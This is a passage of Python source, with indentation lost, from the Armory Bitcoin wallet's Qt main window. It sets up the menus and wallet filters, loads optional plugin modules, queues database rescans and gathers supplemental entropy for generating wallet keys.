self.populateLedgerComboBox()
self.connect(self.comboWltSelect, SIGNAL('activated(int)'),
self.changeWltFilter)
self.lblTot = QRichLabel(self.tr('<b>Maximum Funds:</b>'), doWrap=False);
self.lblSpd = QRichLabel(self.tr('<b>Spendable Funds:</b>'), doWrap=False);
self.lblUcn = QRichLabel(self.tr('<b>Unconfirmed:</b>'), doWrap=False);
self.lblTotalFunds = QRichLabel('-'*12, doWrap=False)
self.lblSpendFunds = QRichLabel('-'*12, doWrap=False)
self.lblUnconfFunds = QRichLabel('-'*12, doWrap=False)
self.lblTotalFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpendFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUnconfFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblTot.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpd.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUcn.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblBTC1 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC2 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC3 = QRichLabel('<b>BTC</b>', doWrap=False)
self.ttipTot = self.createToolTipWidget( self.tr(
'Funds if all current transactions are confirmed. '
'Value appears gray when it is the same as your spendable funds.'))
self.ttipSpd = self.createToolTipWidget( self.tr('Funds that can be spent <i>right now</i>'))
self.ttipUcn = self.createToolTipWidget( self.tr(
'Funds that have less than 6 confirmations, and thus should not '
'be considered <i>yours</i>, yet.'))
self.frmTotals = QFrame()
self.frmTotals.setFrameStyle(STYLE_NONE)
frmTotalsLayout = QGridLayout()
frmTotalsLayout.addWidget(self.lblTot, 0,0)
frmTotalsLayout.addWidget(self.lblSpd, 1,0)
frmTotalsLayout.addWidget(self.lblUcn, 2,0)
frmTotalsLayout.addWidget(self.lblTotalFunds, 0,1)
frmTotalsLayout.addWidget(self.lblSpendFunds, 1,1)
frmTotalsLayout.addWidget(self.lblUnconfFunds, 2,1)
frmTotalsLayout.addWidget(self.lblBTC1, 0,2)
frmTotalsLayout.addWidget(self.lblBTC2, 1,2)
frmTotalsLayout.addWidget(self.lblBTC3, 2,2)
frmTotalsLayout.addWidget(self.ttipTot, 0,3)
frmTotalsLayout.addWidget(self.ttipSpd, 1,3)
frmTotalsLayout.addWidget(self.ttipUcn, 2,3)
self.frmTotals.setLayout(frmTotalsLayout)
# Add the available tabs to the main tab widget
self.MAINTABS = enum('Dash','Ledger')
self.mainDisplayTabs.addTab(self.tabDashboard, self.tr('Dashboard'))
##########################################################################
if not CLI_OPTIONS.disableModules:
if USE_TESTNET or USE_REGTEST:
self.loadArmoryModulesNoZip()
         # Armory modules are disabled on mainnet. When enabled there, they
         # are loaded from zip files instead:
         # else:
         #    self.loadArmoryModules()
##########################################################################
self.lbDialog = None
btnSendBtc = QPushButton(self.tr("Send Bitcoins"))
btnRecvBtc = QPushButton(self.tr("Receive Bitcoins"))
btnWltProps = QPushButton(self.tr("Wallet Properties"))
btnOfflineTx = QPushButton(self.tr("Offline Transactions"))
btnMultisig = QPushButton(self.tr("Lockboxes (Multi-Sig)"))
self.connect(btnWltProps, SIGNAL('clicked()'), self.execDlgWalletDetails)
self.connect(btnRecvBtc, SIGNAL('clicked()'), self.clickReceiveCoins)
self.connect(btnSendBtc, SIGNAL('clicked()'), self.clickSendBitcoins)
self.connect(btnOfflineTx,SIGNAL('clicked()'), self.execOfflineTx)
self.connect(btnMultisig, SIGNAL('clicked()'), self.browseLockboxes)
verStr = 'Armory %s / %s' % (getVersionString(BTCARMORY_VERSION),
UserModeStr(self, self.usermode))
lblInfo = QRichLabel(verStr, doWrap=False)
lblInfo.setFont(GETFONT('var',10))
lblInfo.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
logoBtnFrame = []
logoBtnFrame.append(self.lblLogoIcon)
logoBtnFrame.append(btnSendBtc)
logoBtnFrame.append(btnRecvBtc)
logoBtnFrame.append(btnWltProps)
if self.usermode in (USERMODE.Advanced, USERMODE.Expert):
logoBtnFrame.append(btnOfflineTx)
if self.usermode in (USERMODE.Expert,):
logoBtnFrame.append(btnMultisig)
logoBtnFrame.append(lblInfo)
logoBtnFrame.append('Stretch')
btnFrame = makeVertFrame(logoBtnFrame, STYLE_SUNKEN)
logoWidth=220
btnFrame.sizeHint = lambda: QSize(logoWidth*1.0, 10)
btnFrame.setMaximumWidth(logoWidth*1.2)
btnFrame.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)
layout = QGridLayout()
layout.addWidget(btnFrame, 0, 0, 1, 1)
layout.addWidget(wltFrame, 0, 1, 1, 1)
layout.addWidget(self.mainDisplayTabs, 1, 0, 1, 2)
layout.setRowStretch(0, 1)
layout.setRowStretch(1, 5)
# Attach the layout to the frame that will become the central widget
mainFrame = QFrame()
mainFrame.setLayout(layout)
self.setCentralWidget(mainFrame)
self.setMinimumSize(750,500)
# Start the user at the dashboard
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
##########################################################################
# Set up menu and actions
#MENUS = enum('File', 'Wallet', 'User', "Tools", "Network")
currmode = self.getSettingOrSetDefault('User_Mode', 'Advanced')
MENUS = enum('File', 'User', 'Tools', 'Addresses', 'Wallets', \
'MultiSig', 'Help')
self.menu = self.menuBar()
self.menusList = []
self.menusList.append( self.menu.addMenu(self.tr('&File')) )
self.menusList.append( self.menu.addMenu(self.tr('&User')) )
self.menusList.append( self.menu.addMenu(self.tr('&Tools')) )
self.menusList.append( self.menu.addMenu(self.tr('&Addresses')) )
self.menusList.append( self.menu.addMenu(self.tr('&Wallets')) )
self.menusList.append( self.menu.addMenu(self.tr('&MultiSig')) )
self.menusList.append( self.menu.addMenu(self.tr('&Help')) )
#self.menusList.append( self.menu.addMenu('&Network') )
def exportTx():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, self.tr('Transactions Unavailable'),
self.tr('Transaction history cannot be collected until Armory is '
'in online mode. Please try again when Armory is online. '),
QMessageBox.Ok)
return
else:
DlgExportTxHistory(self,self).exec_()
actExportTx = self.createAction(self.tr('&Export Transactions...'), exportTx)
actSettings = self.createAction(self.tr('&Settings...'), self.openSettings)
actMinimApp = self.createAction(self.tr('&Minimize Armory'), self.minimizeArmory)
actExportLog = self.createAction(self.tr('Export &Log File...'), self.exportLogFile)
actCloseApp = self.createAction(self.tr('&Quit Armory'), self.closeForReal)
self.menusList[MENUS.File].addAction(actExportTx)
self.menusList[MENUS.File].addAction(actSettings)
self.menusList[MENUS.File].addAction(actMinimApp)
self.menusList[MENUS.File].addAction(actExportLog)
self.menusList[MENUS.File].addAction(actCloseApp)
def chngStd(b):
if b: self.setUserMode(USERMODE.Standard)
def chngAdv(b):
if b: self.setUserMode(USERMODE.Advanced)
def chngDev(b):
if b: self.setUserMode(USERMODE.Expert)
modeActGrp = QActionGroup(self)
actSetModeStd = self.createAction(self.tr('&Standard'), chngStd, True)
actSetModeAdv = self.createAction(self.tr('&Advanced'), chngAdv, True)
actSetModeDev = self.createAction(self.tr('&Expert'), chngDev, True)
modeActGrp.addAction(actSetModeStd)
modeActGrp.addAction(actSetModeAdv)
modeActGrp.addAction(actSetModeDev)
self.menusList[MENUS.User].addAction(actSetModeStd)
self.menusList[MENUS.User].addAction(actSetModeAdv)
self.menusList[MENUS.User].addAction(actSetModeDev)
LOGINFO('Usermode: %s', currmode)
self.firstModeSwitch=True
if currmode=='Standard':
self.usermode = USERMODE.Standard
actSetModeStd.setChecked(True)
elif currmode=='Advanced':
self.usermode = USERMODE.Advanced
actSetModeAdv.setChecked(True)
elif currmode=='Expert':
self.usermode = USERMODE.Expert
actSetModeDev.setChecked(True)
def openMsgSigning():
MessageSigningVerificationDialog(self,self).exec_()
def openBlindBroad():
if not TheSDM.satoshiIsAvailable():
QMessageBox.warning(self, self.tr("Not Online"), self.tr(
'Bitcoin Core is not available, so Armory will not be able '
'to broadcast any transactions for you.'), QMessageBox.Ok)
return
DlgBroadcastBlindTx(self,self).exec_()
actOpenSigner = self.createAction(self.tr('&Message Signing/Verification...'), openMsgSigning)
if currmode=='Expert':
actOpenTools = self.createAction(self.tr('&EC Calculator...'), lambda: DlgECDSACalc(self,self, 1).exec_())
actBlindBroad = self.createAction(self.tr('&Broadcast Raw Transaction...'), openBlindBroad)
self.menusList[MENUS.Tools].addAction(actOpenSigner)
if currmode=='Expert':
self.menusList[MENUS.Tools].addAction(actOpenTools)
self.menusList[MENUS.Tools].addAction(actBlindBroad)
def mkprom():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, self.tr('Offline'), self.tr(
'Armory is currently offline, and cannot determine what funds are '
'available for Simulfunding. Please try again when Armory is in '
'online mode.'), QMessageBox.Ok)
else:
DlgCreatePromNote(self, self).exec_()
def msrevsign():
title = self.tr('Import Multi-Spend Transaction')
descr = self.tr(
'Import a signature-collector text block for review and signing. '
'It is usually a block of text with "TXSIGCOLLECT" in the first line, '
'or a <i>*.sigcollect.tx</i> file.')
ftypes = ['Signature Collectors (*.sigcollect.tx)']
dlgImport = DlgImportAsciiBlock(self, self, title, descr, ftypes,
UnsignedTransaction)
dlgImport.exec_()
if dlgImport.returnObj:
DlgMultiSpendReview(self, self, dlgImport.returnObj).exec_()
simulMerge = lambda: DlgMergePromNotes(self, self).exec_()
actMakeProm = self.createAction(self.tr('Simulfund &Promissory Note'), mkprom)
actPromCollect = self.createAction(self.tr('Simulfund &Collect && Merge'), simulMerge)
actMultiSpend = self.createAction(self.tr('Simulfund &Review && Sign'), msrevsign)
if not self.usermode==USERMODE.Expert:
self.menusList[MENUS.MultiSig].menuAction().setVisible(False)
# Addresses
actAddrBook = self.createAction(self.tr('View &Address Book...'), self.execAddressBook)
actSweepKey = self.createAction(self.tr('&Sweep Private Key/Address...'), self.menuSelectSweepKey)
actImportKey = self.createAction(self.tr('&Import Private Key/Address...'), self.menuSelectImportKey)
self.menusList[MENUS.Addresses].addAction(actAddrBook)
if not currmode=='Standard':
self.menusList[MENUS.Addresses].addAction(actImportKey)
self.menusList[MENUS.Addresses].addAction(actSweepKey)
actCreateNew = self.createAction(self.tr('&Create New Wallet'), self.startWalletWizard)
actImportWlt = self.createAction(self.tr('&Import or Restore Wallet'), self.execImportWallet)
actAddressBook = self.createAction(self.tr('View &Address Book'), self.execAddressBook)
actRecoverWlt = self.createAction(self.tr('&Fix Damaged Wallet'), self.RecoverWallet)
self.menusList[MENUS.Wallets].addAction(actCreateNew)
self.menusList[MENUS.Wallets].addAction(actImportWlt)
self.menusList[MENUS.Wallets].addSeparator()
self.menusList[MENUS.Wallets].addAction(actRecoverWlt)
execAbout = lambda: DlgHelpAbout(self).exec_()
actAboutWindow = self.createAction(self.tr('&About Armory...'), execAbout)
actClearMemPool = self.createAction(self.tr('Clear All Unconfirmed'), self.clearMemoryPool)
actRescanDB = self.createAction(self.tr('Rescan Databases'), self.rescanNextLoad)
actRebuildDB = self.createAction(self.tr('Rebuild and Rescan Databases'), self.rebuildNextLoad)
actRescanBalance = self.createAction(self.tr('Rescan Balance'), self.rescanBalanceNextLoad)
actFactoryReset = self.createAction(self.tr('Factory Reset'), self.factoryReset)
self.menusList[MENUS.Help].addAction(actAboutWindow)
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addAction(actClearMemPool)
self.menusList[MENUS.Help].addAction(actRescanBalance)
self.menusList[MENUS.Help].addAction(actRescanDB)
self.menusList[MENUS.Help].addAction(actRebuildDB)
self.menusList[MENUS.Help].addAction(actFactoryReset)
execMSHack = lambda: DlgSelectMultiSigOption(self,self).exec_()
execBrowse = lambda: DlgLockboxManager(self,self).exec_()
actMultiHacker = self.createAction(self.tr('Multi-Sig Lockboxes'), execMSHack)
actBrowseLockboxes = self.createAction(self.tr('Lockbox &Manager...'), execBrowse)
#self.menusList[MENUS.MultiSig].addAction(actMultiHacker)
self.menusList[MENUS.MultiSig].addAction(actBrowseLockboxes)
self.menusList[MENUS.MultiSig].addAction(actMakeProm)
self.menusList[MENUS.MultiSig].addAction(actPromCollect)
self.menusList[MENUS.MultiSig].addAction(actMultiSpend)
self.startBlockchainProcessingInitialization()
# Restore any main-window geometry saved in the settings file
hexgeom = self.settings.get('MainGeometry')
hexwltsz = self.settings.get('MainWalletCols')
if len(hexgeom)>0:
geom = QByteArray.fromHex(hexgeom)
self.restoreGeometry(geom)
if len(hexwltsz)>0:
restoreTableView(self.walletsView, hexwltsz)
if DO_WALLET_CHECK:
self.checkWallets()
self.blkReceived = RightNow()
self.setDashboardDetails()
self.execIntroDialog()
#reactor.callLater(1, self.Heartbeat)
if self.getSettingOrSetDefault('MinimizeOnOpen', False) and not CLI_ARGS:
LOGINFO('MinimizeOnOpen is True')
self.minimizeArmory()
if CLI_ARGS:
self.signalExecution.callLater(1, self.uriLinkClicked, CLI_ARGS[0])
if OS_MACOSX:
self.macNotifHdlr = ArmoryMac.MacNotificationHandler()
# Now that construction of the UI is done
# Check for warnings to be displayed
# This is true if and only if the command line has a data dir that doesn't exist
# and can't be created.
if not CLI_OPTIONS.datadir in [ARMORY_HOME_DIR, DEFAULT]:
QMessageBox.warning(self, self.tr('Default Data Directory'), self.tr(
'Armory is using the default data directory because '
'the data directory specified in the command line could '
'not be found nor created.'), QMessageBox.Ok)
# This is true if and only if the command line has a database dir that doesn't exist
# and can't be created.
elif not CLI_OPTIONS.armoryDBDir in [ARMORY_DB_DIR, DEFAULT]:
QMessageBox.warning(self, self.tr('Default Database Directory'), self.tr(
'Armory is using the default database directory because '
'the database directory specified in the command line could '
'not be found nor created.'), QMessageBox.Ok)
# This is true if and only if the command line has a bitcoin dir that doesn't exist
#if not CLI_OPTIONS.satoshiHome in [BTC_HOME_DIR, DEFAULT]:
# QMessageBox.warning(self, self.tr('Bitcoin Directory'), self.tr(
# 'Armory is using the default Bitcoin directory because '
# 'the Bitcoin directory specified in the command line could '
# 'not be found.'), QMessageBox.Ok)
if not self.getSettingOrSetDefault('DNAA_DeleteLevelDB', False) and \
os.path.exists(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA)):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Delete Old DB Directory'),
            self.tr('Armory detected an older version database. '
            'Do you want to delete the old database? Choose yes if '
            'you do not think you will revert to an older version of Armory.'), self.tr('Do not ask this question again'))
if reply[0]==True:
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA))
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_HEADERS))
if reply[1]==True:
self.writeSetting('DNAA_DeleteLevelDB', True)
self.signalExecution.callLater(1, self.walletTimeoutCheck)
####################################################
def getWatchingOnlyWallets(self):
result = []
for wltID in self.walletIDList:
if self.walletMap[wltID].watchingOnly:
result.append(wltID)
return result
####################################################
def changeWltFilter(self):
if self.netMode == NETWORKMODE.Offline:
return
currIdx = max(self.comboWltSelect.currentIndex(), 0)
currText = unicode(self.comboWltSelect.currentText()).lower()
if currText.lower().startswith('custom filter'):
self.walletsView.showColumn(0)
#self.walletsView.resizeColumnToContents(0)
else:
self.walletsView.hideColumn(0)
if currIdx != 4:
for i in range(0, len(self.walletVisibleList)):
self.walletVisibleList[i] = False
# If a specific wallet is selected, just set that and you're done
if currIdx > 4:
self.walletVisibleList[currIdx-7] = True
self.setWltSetting(self.walletIDList[currIdx-7], 'LedgerShow', True)
else:
# Else we walk through the wallets and flag the particular ones
typelist = [[wid, determineWalletType(self.walletMap[wid], self)[0]] \
for wid in self.walletIDList]
for i,winfo in enumerate(typelist):
wid,wtype = winfo[:]
if currIdx==0:
# My wallets
doShow = wtype in [WLTTYPES.Offline,WLTTYPES.Crypt,WLTTYPES.Plain]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==1:
# Offline wallets
doShow = winfo[1] in [WLTTYPES.Offline]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==2:
# Others' Wallets
doShow = winfo[1] in [WLTTYPES.WatchOnly]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==3:
# All Wallets
self.walletVisibleList[i] = True
self.setWltSetting(wid, 'LedgerShow', True)
self.mainLedgerCurrentPage = 1
self.PageLineEdit.setText(unicode(self.mainLedgerCurrentPage))
self.wltIDList = []
for i,vis in enumerate(self.walletVisibleList):
if vis:
wltid = self.walletIDList[i]
if self.walletMap[wltid].isEnabled:
self.wltIDList.append(wltid)
TheBDM.bdv().updateWalletsLedgerFilter(self.wltIDList)
############################################################################
def loadArmoryModulesNoZip(self):
"""
This method checks for any .py files in the exec directory
"""
moduleDir = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if not moduleDir or not os.path.exists(moduleDir):
return
LOGWARN('Attempting to load modules from: %s' % MODULES_ZIP_DIR_NAME)
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleListNoZip(moduleDir)
for moduleName,infoMap in modMap.iteritems():
module = dynamicImportNoZip(moduleDir, moduleName, globals())
plugObj = module.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critical(self, self.tr("Bad Module"), self.tr(
'The module you attempted to load (%1) is malformed. It is '
'missing attributes that are needed for Armory to load it. '
'It will be skipped.').arg(moduleName), QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt > verPluginInt:
reply = QMessageBox.warning(self, self.tr("Outdated Module"), self.tr(
'Module "%1" is only specified to work up to Armory version %2. '
'You are using Armory version %3. Please remove the module if '
'you experience any problems with it, or contact the maintainer '
'for a new version. '
'<br><br> '
'Do you want to continue loading the module?').arg(moduleName, plugObj.maxVersion, getVersionString(BTCARMORY_VERSION)),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra methods the plugin wants called by the main window
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
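# For reference, a minimal plugin skeleton that would pass the checks
# above (hypothetical sketch; only PluginObject, tabName, maxVersion,
# getTabToDisplay and the optional inject* hooks are inspected here):
#
#    class PluginObject(object):
#       tabName = 'My Plugin'
#       maxVersion = '0.96'
#
#       def __init__(self, mainWindow):
#          self.main = mainWindow
#
#       def getTabToDisplay(self):
#          return QWidget()
#
#       def injectHeartbeatAlwaysFunc(self):
#          pass   # optional; gets appended to extraHeartbeatAlways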
############################################################################
def loadArmoryModules(self):
"""
This method checks for any .zip files in the modules directory
"""
modulesZipDirPath = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if modulesZipDirPath and os.path.exists(modulesZipDirPath):
self.tempModulesDirName = tempfile.mkdtemp('modules')
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleList(modulesZipDirPath)
for moduleName,infoMap in modMap.iteritems():
moduleZipPath = os.path.join(modulesZipDirPath, infoMap[MODULE_PATH_KEY])
if infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Invalid:
reply = QMessageBox.warning(self, self.tr("Invalid Module"), self.tr(
'Armory detected the following module which is '
'<font color=%1><b>invalid</b></font>:'
'<br><br>'
' <b>Module Name:</b> %2<br>'
' <b>Module Path:</b> %3<br>'
'<br><br>'
'Armory will only run a module from a zip file that '
'has the required structure.').arg(htmlColor('TextRed'), moduleName, moduleZipPath), QMessageBox.Ok)
elif not USE_TESTNET and not USE_REGTEST and infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Unsigned:
reply = QMessageBox.warning(self, self.tr("UNSIGNED Module"), self.tr(
'Armory detected the following module which '
'<font color="%1"><b>has not been signed by Armory</b></font> and may be dangerous: '
'<br><br>'
' <b>Module Name:</b> %2<br>'
' <b>Module Path:</b> %3<br>'
'<br><br>'
'Armory will not allow you to run this module.').arg(htmlColor('TextRed'), moduleName, moduleZipPath), QMessageBox.Ok)
else:
ZipFile(moduleZipPath).extract(INNER_ZIP_FILENAME, self.tempModulesDirName)
ZipFile(os.path.join(self.tempModulesDirName,INNER_ZIP_FILENAME)).extractall(self.tempModulesDirName)
plugin = importModule(self.tempModulesDirName, moduleName, globals())
plugObj = plugin.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critical(self, self.tr("Bad Module"), self.tr(
'The module you attempted to load (%1) is malformed. It is '
'missing attributes that are needed for Armory to load it. '
'It will be skipped.').arg(moduleName), QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt > verPluginInt:
reply = QMessageBox.warning(self, self.tr("Outdated Module"), self.tr(
'Module %1 is only specified to work up to Armory version %2. '
'You are using Armory version %3. Please remove the module if '
'you experience any problems with it, or contact the maintainer '
'for a new version.'
'<br><br>'
'Do you want to continue loading the module?').arg(moduleName, plugObj.maxVersion, getVersionString(BTCARMORY_VERSION)),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra methods the plugin wants called by the main window
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def factoryReset(self):
"""
reply = QMessageBox.information(self,'Factory Reset', \
'You are about to revert all Armory settings '
'to the state they were in when Armory was first installed. '
'<br><br>'
'If you click "Yes," Armory will exit after settings are '
'reverted. You will have to manually start Armory again.'
'<br><br>'
'Do you want to continue? ', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.removeSettingsOnClose = True
self.closeForReal()
"""
if DlgFactoryReset(self,self).exec_():
# The dialog already wrote all the flag files, just close now
self.closeForReal()
####################################################
def clearMemoryPool(self):
touchFile( os.path.join(ARMORY_HOME_DIR, 'clearmempool.flag') )
msg = self.tr(
'The next time you restart Armory, all unconfirmed transactions will '
'be cleared allowing you to retry any stuck transactions.')
if not self.doAutoBitcoind:
msg += self.tr(
'<br><br>Make sure you also restart Bitcoin Core '
'(or bitcoind) and let it synchronize again before you restart '
'Armory. Doing so will clear its memory pool as well.')
QMessageBox.information(self, self.tr('Memory Pool'), msg, QMessageBox.Ok)
####################################################
def registerWidgetActivateTime(self, widget):
# This is a bit of a hack, but it's a very isolated method to make
# it easy to link widgets to my entropy accumulator
# I just realized this doesn't do exactly what I originally intended...
# I wanted it to work on arbitrary widgets like QLineEdits, but using
# super is not the answer. What I want is the original class method
# to be called after logging keypress, not its superclass method.
# Nonetheless, it does do what I need it to, as long as you only
# register frames and dialogs, not individual widgets/controls.
mainWindow = self
def newKPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyPressEvent(event)
def newKRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyReleaseEvent(event)
def newMPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mousePressEvent(event)
def newMRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mouseReleaseEvent(event)
from types import MethodType
widget.keyPressEvent = MethodType(newKPE, widget)
widget.keyReleaseEvent = MethodType(newKRE, widget)
widget.mousePressEvent = MethodType(newMPE, widget)
widget.mouseReleaseEvent = MethodType(newMRE, widget)
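# Typical usage (an assumption -- call sites aren't shown here): invoke
# this on wizard frames/dialogs whose activity should feed the entropy
# pool, e.g.
#    self.registerWidgetActivateTime(walletWizardDlg)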
####################################################
def logEntropy(self):
try:
self.entropyAccum.append(RightNow())
self.entropyAccum.append(QCursor.pos().x())
self.entropyAccum.append(QCursor.pos().y())
except:
LOGEXCEPT('Error logging keypress entropy')
####################################################
def getExtraEntropyForKeyGen(self):
# The entropyAccum var has all the timestamps, down to the microsecond,
# of every keypress and mouseclick made during the wallet creation
# wizard. Also logs mouse positions on every press, though it will
# be constant while typing. Either way, even if they change no text
# and use a 5-char password, we will still pick up about 40 events.
# Then we throw in the [name,time,size] triplets of some volatile
# system directories, and the hash of a file in that directory that
# is expected to have timestamps and system-dependent parameters.
# Finally, take a desktop screenshot...
# All three of these sources are likely to have sufficient entropy alone.
source1,self.entropyAccum = self.entropyAccum,[]
if len(source1)==0:
LOGERROR('Error getting extra entropy from mouse & key presses')
source2 = []
try:
if OS_WINDOWS:
tempDir = os.getenv('TEMP')
extraFiles = []
elif OS_LINUX:
tempDir = '/var/log'
extraFiles = ['/var/log/Xorg.0.log']
elif OS_MACOSX:
tempDir = '/var/log'
extraFiles = ['/var/log/system.log']
# A simple listing of the directory files, sizes and times is good
if os.path.exists(tempDir):
for fname in os.listdir(tempDir):
fullpath = os.path.join(tempDir, fname)
sz = os.path.getsize(fullpath)
tm = os.path.getmtime(fullpath)
source2.append([fname, sz, tm])
# On Linux we also throw in Xorg.0.log
for f in extraFiles:
if os.path.exists(f):
with open(f,'rb') as infile:
source2.append(hash256(infile.read()))
if len(source2)==0:
LOGWARN('Second source of supplemental entropy will be empty')
except:
LOGEXCEPT('Error getting extra entropy from filesystem')
source3 = ''
try:
pixDesk = QPixmap.grabWindow(QApplication.desktop().winId())
pixRaw = QByteArray()
pixBuf = QBuffer(pixRaw)
pixBuf.open(QIODevice.WriteOnly)
pixDesk.save(pixBuf, 'PNG')
source3 = pixBuf.buffer().toHex()
except:
LOGEXCEPT('Third source of entropy (desktop screenshot) failed')
if len(source3)==0:
LOGWARN('Error getting extra entropy from screenshot')
LOGINFO('Adding %d keypress events to the entropy pool', len(source1)/3)
LOGINFO('Adding %s bytes of filesystem data to the entropy pool',
bytesToHumanSize(len(str(source2))))
LOGINFO('Adding %s bytes from desktop screenshot to the entropy pool',
bytesToHumanSize(len(str(source3))/2))
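# Collapse the variable-length pool into a fixed 32 bytes with a keyed
# hash; as noted above, any single strong source should be sufficient.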
allEntropy = ''.join([str(a) for a in [source1, source2, source3]])
return SecureBinaryData(HMAC256('Armory Entropy', allEntropy))
####################################################
def rescanNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Rescan?'), self.tr(
'The next time you restart Armory, it will rescan the blockchain '
'database, and reconstruct your wallet histories from scratch. '
'The rescan will take 10-60 minutes depending on your system. '
'<br><br> '
'Do you wish to force a rescan on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescan.flag') )
####################################################
def rebuildNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Rebuild?'), self.tr(
'The next time you restart Armory, it will rebuild and rescan '
'the entire blockchain database. This operation can take between '
'30 minutes and 4 hours depending on your system speed. '
'<br><br>'
'Do you wish to force a rebuild on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
####################################################
def rescanBalanceNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Balance Rescan?'), self.tr(
'The next time you restart Armory, it will rescan the balance of '
'your wallets. This operation typically takes less than a minute. '
'<br><br>'
'Do you wish to force a balance rescan on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescanbalance.flag') )
####################################################
def loadFailedManyTimesFunc(self, nFail):
"""
For now, if the user is having trouble loading the blockchain, all
we do is delete mempool.bin (which is frequently corrupted but not
detected as such). However, we may expand this in the future, if
it's determined that more-complicated things are necessary.
"""
LOGERROR('%d attempts to load blockchain failed. Remove mempool.bin.' % nFail)
mempoolfile = os.path.join(ARMORY_HOME_DIR,'mempool.bin')
if os.path.exists(mempoolfile):
os.remove(mempoolfile)
